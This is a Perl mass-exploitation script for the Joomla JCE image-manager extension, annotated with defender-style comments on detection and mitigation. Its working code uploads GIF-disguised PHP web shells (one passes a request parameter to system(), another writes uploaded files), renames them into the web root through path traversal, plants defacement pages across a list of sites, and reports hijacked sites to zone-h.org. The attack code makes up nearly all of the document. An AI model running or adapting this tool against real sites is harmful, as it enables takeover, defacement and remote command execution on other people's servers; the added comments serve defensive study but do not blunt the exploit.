- #!/usr/bin/perl -W
- use Socket;
- use IO::Socket;
- use IO::Socket::INET;
- use LWP::UserAgent;
- use HTTP::Request::Common qw(POST);
- use HTTP::Request::Common qw(GET);
- # Shared LWP client, used for the initial probe and the later verification GETs.
- # Detection: the User-Agent below is a fixed literal (also repeated in the raw-socket
- # requests further down), so it shows up verbatim in the access logs of any site
- # this tool was run against.
- $ag = LWP::UserAgent->new();
- $ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
- $ag->timeout(10);
- #Recoded by No\One
- #print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
- #print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||\n\n";
- # $a = script name with any backslash-separated directory part stripped;
- # it is only used in the usage text and in the console title.
- if($0 =~ /^(.*)\\(.+)$/){chomp($a = $2);}else{chomp($a = $0);}
- # Input is either a list file (one site per line) or "-s <site>" for a single site.
- if(!defined($ARGV[0])) { print "\n * Modo de usar => $a lista.txt ou $a -s www.site.com.br \n"; exit; }
- $TXT = $ARGV[0]; if($TXT eq "-s"){@TXT = $ARGV[1]; $aq = $ARGV[1];
- if(!defined($ARGV[1])) { print "\n\n * Modo de usar => $a lista.txt ou $a -s www.site.com\n\n"; exit; }
- }else{open(TXT,"<$TXT"); chomp(@TXT=<TXT>); close(TXT); $aq = $ARGV[0];}
- # $tx = number of queued sites (shown as the total in the progress title).
- $tx = $#TXT+1;
- print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.2 .::.\n\n";
- # Counters for accepted / rejected Zone-H submissions.
- $ok = '0'; $erro = '0';
- # Main loop: one pass per listed site. "next site" abandons the current entry.
- # Defender summary of what the loop leaves behind on a targeted host:
- #   * requests to index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager
- #   * a multipart upload of a ".gif" followed by a JSON "folderRename" call
- #   * files named x.html / ck.htm / xk.txt / xh.txt / x.php / xxx.php / xxu.php
- #     requested afterwards under /, /tmp/, /cache/ and /images/
- site: foreach(@TXT){ chomp(my $site = $_);
- # $cm = optional sub-directory of the install; $porra = counter appended to upload names.
- $cm=''; $porra = '0';
- # Normalise the entry: drop the scheme, keep the host in $site and one path part in $cm.
- if($site =~ /http:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
- }elsif($site =~ /http:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
- }elsif($site =~ /https:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
- }elsif($site =~ /https:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
- }elsif($site =~ /http:\/\/(.*)\//){$site = $1;
- }elsif($site =~ /http:\/\/(.*)/){$site = $1;
- }elsif($site =~ /https:\/\/(.*)\//){$site = $1;
- }elsif($site =~ /https:\/\/(.*)/){$site = $1;
- }elsif($site =~ /(.*)\/(.*)\//){$site = $1; $cm = $2;
- }elsif($site =~ /(.*)\/(.*)/){$site = $1; $cm = $2;
- }elsif($site =~ /(.*)\//){$site = $1;}
- # Scheme and port are fixed here, so every request this script makes is plain HTTP
- # on port 80, including for entries that were listed as https://.
- $http = 'http://'; $porta = "80";
- # The two JCE image-manager URLs used below. Detection: both query strings are
- # literals (version=1576&cid=20, and method=form&cid=20 plus the fixed
- # 6bc427c8...=cf6dd3cf... pair), so they can be searched for in web server logs as-is.
- $script = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20';
- $up = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b';
- print "\n>> $site ->";
- $cs++;
- # Progress display only; presumably the Windows console "title" command -- confirm.
- system "title $a $aq - [ $cs\/$tx ] =-= Zone-H [ OK ($ok) ~ ERRO ($erro) ]";
- ############################################### Packet 1 --> probe: does the JCE image manager answer?
- # When the site lives in a sub-directory, both URLs are prefixed with it.
- if($cm){ $script = '/'."$cm"."$script"; $up = '/'."$cm"."$up"; }
- $pageURL= "$http"."$site"."$script";
- $getp = $ag->request(HTTP::Request->new(GET => $pageURL));
- $get = $getp->content;
- # The site is skipped unless the response body contains one of these three markers.
- if($get !~ m/multipart\/form-data|hastip|\/plugins\/editors\/jce\//g){ print " [!]"; next site;}
- # Destination names passed to the rename call below (relative, using "../").
- # Incident response: these are the file names to look for on a host that shows
- # the requests above in its logs.
- my @index = (
- '../../xk.txt',
- '../../xh.txt',
- '../../ck.htm',
- '../../tmp/x.html',
- '../../cache/x.html',
- '../x.html',
- '../../tmp/ck.htm',
- '../../cache/ck.htm',
- '../ck.htm',
- '../xxx.php',
- '../xxu.php');
- if($cm){push(@index,'../../../x.htm','../../../x.html','../../../x.php','../../../xk.txt','../../../xh.txt','../../../ck.htm');}
- push(@index,'../../x.php','../../x.php');
- # One upload + one rename per destination name.
- foreach(@index){
- chomp(my $indx = $_);
- $porra++;
- # Pick the temporary upload name ($narq = prefix + counter) and the file body ($cont)
- # from the destination name. The text bodies are the defacement message; searching
- # the web root for that string is a quick triage step.
- if($indx =~ /xk/){ $narq = 'arti'."$porra";
- $cont = 'Invasão feita por Renatinho';}
- if($indx =~ /xh/){ $narq = 'not'."$porra";
- $cont = 'Invasão feita por Renatinho';}
- if($indx =~ /configuration/){ $narq = 'clor'."$porra";
- $cont = 'Invasão feita por Renatinho<?php exit;?>';}
- if($indx =~ /index|ck/){ $narq = 'plas'."$porra";
- $cont = 'Invasão feita por Renatinho';}
- # The next two bodies start with a GIF89a header followed by PHP: the first passes a
- # request parameter to system(), the second copies an uploaded file into place.
- # Detection: any file under the web root that begins with "GIF89a" and contains
- # "<?php" should be treated as a web shell, whatever its extension.
- if($indx =~ /xxx/){ $narq = 'gligie'."$porra";
- $cont = 'GIF89a
- <?php system("$_GET[cmd]"); exit; ?>';}
- if($indx =~ /xxu/){ $narq = 'tir'."$porra";
- $cont = 'GIF89a u
- <?php @copy($_FILES[file][tmp_name], $_FILES[file][name]); exit; ?>';}
- #print "\n\n $indx - $narq \n$cont \n\n----------------------------------------------";
- ############################################### Packet 2 --> upload the body under a .gif name
- # Raw-socket POST to $up; a failed connect moves on to the next site.
- # Detection: the multipart boundary (...41184676334), the Content-Length value (769)
- # and the bare "\n" line endings are all fixed literals in this request, and the
- # uploaded part is declared as image/gif with a "<prefix><number>.gif" file name.
- $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
- print $remote "POST $up HTTP/1.1"."\n";
- print $remote "Host: $site"."\n";
- print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
- print $remote "Content-Type: multipart/form-data; boundary=---------------------------41184676334"."\n";
- print $remote "Content-Length: 769"."\n\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="upload-dir"'."\n\n";
- print $remote '/'."\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="Filedata"; filename=""'."\n";
- print $remote 'Content-Type: application/octet-stream'."\n\n\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="upload-overwrite"'."\n\n";
- print $remote "0"."\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="Filedata"; filename="'.$narq.'.gif"'."\n";
- print $remote 'Content-Type: image/gif'."\n\n";
- print $remote "$cont"."\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="upload-name"'."\n\n";
- print $remote "$narq"."\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="action"'."\n\n";
- print $remote 'upload'."\n";
- print $remote "-----------------------------41184676334--"."\n\n";
- close($remote);
- ############################################### Packet 3 --> rename the uploaded .gif to the destination name (extension change)
- # Second raw-socket POST, to $script, with "X-Request: JSON" and a body that calls
- # "folderRename" with the .gif as source and the destination name as target.
- # Detection: a folderRename request whose target contains "../" or ends in a
- # different extension than its source.
- # Mitigation: upgrade JCE to a release that fixes this upload/rename flaw (the fixed
- # version is not stated on this page) and deny script execution in images/, tmp/
- # and cache/ at the web server.
- $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
- $json = 'json={"fn":"folderRename","args":["'.$narq.'.gif","'.$indx.'"]}';
- print $remote "POST $script HTTP/1.1"."\n";
- print $remote "Host: $site"."\n";
- print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
- print $remote 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'."\n";
- print $remote 'X-Request: JSON'."\n";
- print $remote "Content-Length: ".length($json).""."\n\n";
- print $remote "$json"."\n\n";
- #while(<$remote>){print "$_";}
- close($remote);
- }
- ############################################### Packet 4 --> checking the upload result
- # GET the two .php names under /images/ (and under the sub-directory, if any); a body
- # containing "GIF89a" is taken as success and the URL is appended to a local SH.txt.
- my @xxx=('/images/xxu.php','/images/xxx.php');
- if($cm){ push(@xxx,'/'."$cm".'/images/xxu.php','/'."$cm".'/images/xxx.php'); }
- foreach(@xxx){
- $shc = 'http://'."$site"."$_";
- my $resc=$ag->request(HTTP::Request->new(GET => $shc));
- $respc = $resc->content;
- if($respc =~ m/GIF89a/g){ open(SHU,">>SH.txt"); print SHU "$shc\n"; close(SHU); } }
- # Then GET a fixed list of index-like paths and look for the marker "KkK1337".
- # Detection: this burst of GETs, from the same client and User-Agent right after the
- # two POSTs, is the tail of the tool's request sequence in the access log.
- my @indxs = ('/','/ck.htm','/xk.txt','/xh.txt','/tmp/','/cache/','/images/','/tmp/ck.htm','/cache/ck.htm','/images/ck.htm');
- if($cm){
- push(@indxs,'/'."$cm".'/','/'."$cm".'/ck.htm','/'."$cm".'/xk.txt','/'."$cm".'/xh.txt','/'."$cm".'/tmp/','/'."$cm".'/cache/','/'."$cm".'/images/','/'."$cm".'/tmp/ck.htm','/'."$cm".'/cache/ck.htm','/'."$cm".'/images/ck.htm')}
- foreach(@indxs){ chomp(my $iind = $_);
- $urst = 'http://'."$site"."$iind";
- my $res=$ag->request(HTTP::Request->new(GET => $urst));
- $resp = $res->content;
- # On a marker match the URL is submitted to zone-h.org (/notify/single) under the
- # defacer name "KkK1337", appended to a local HCKDS.txt, and the loop moves to the
- # next site. Victims can check the Zone-H archive for their domain under that name.
- if($resp =~ m/KkK1337/g){ $sthckd = "$site"."$iind";
- $sockz = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => "80", Proto => "tcp") or next;
- print $sockz "POST /notify/single HTTP/1.0\r\n";
- print $sockz "Accept: */*\r\n";
- print $sockz "Referer: http://www.zone-h.org/notify/single\r\n";
- print $sockz "Accept-Language: pt-br\r\n";
- print $sockz "Content-Type: application/x-www-form-urlencoded\r\n";
- print $sockz "Connection: Keep-Alive\r\n";
- print $sockz "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801\r\n";
- print $sockz "Host: www.zone-h.org\r\n";
- $length=length("defacer=KkK1337&domain1=http%3A%2F% 2F$sthckd&hackmode=17&reason=1");
- print $sockz "Content-Length: $length\r\n";
- print $sockz "Pragma: no-cache\r\n";
- print $sockz "\r\n";
- print $sockz "defacer=KkK1337&domain1=http%3A%2F%2F$sthckd&hackmode=17&reason=1\r\n";
- # The reply is read in full; "ERROR:" in it counts as a rejected submission.
- $zn = join('',<$sockz>);
- if($zn =~ m/ERROR:/g){print " [ Zone-H ] ".$http.$sthckd." [ ERRO ]"; $erro++;}else{print " [ Zone-H ] ".$http.$sthckd." [ OK ]"; $ok++;}
- close($sockz);
- open(HCKDS,">>HCKDS.txt"); print HCKDS "$http"."$sthckd\n"; close(HCKDS);
- $sthckd = ''; $hk++; next site;}
- } }
- # Run summary: unset counters are normalised to 0, and the totals line is printed
- # only when at least one site was recorded ($hk is incremented once per HCKDS.txt entry).
- if(!$hk){$hk=0;}if(!$ok){$ok=0;}if(!$erro){$erro=0;}
- if($hk){
- print "\n\n [ Total Hacked -> $hk -#- Success sended Zone-h -> $ok -#- Error sended to Zone-h -> $erro ]\n\n";}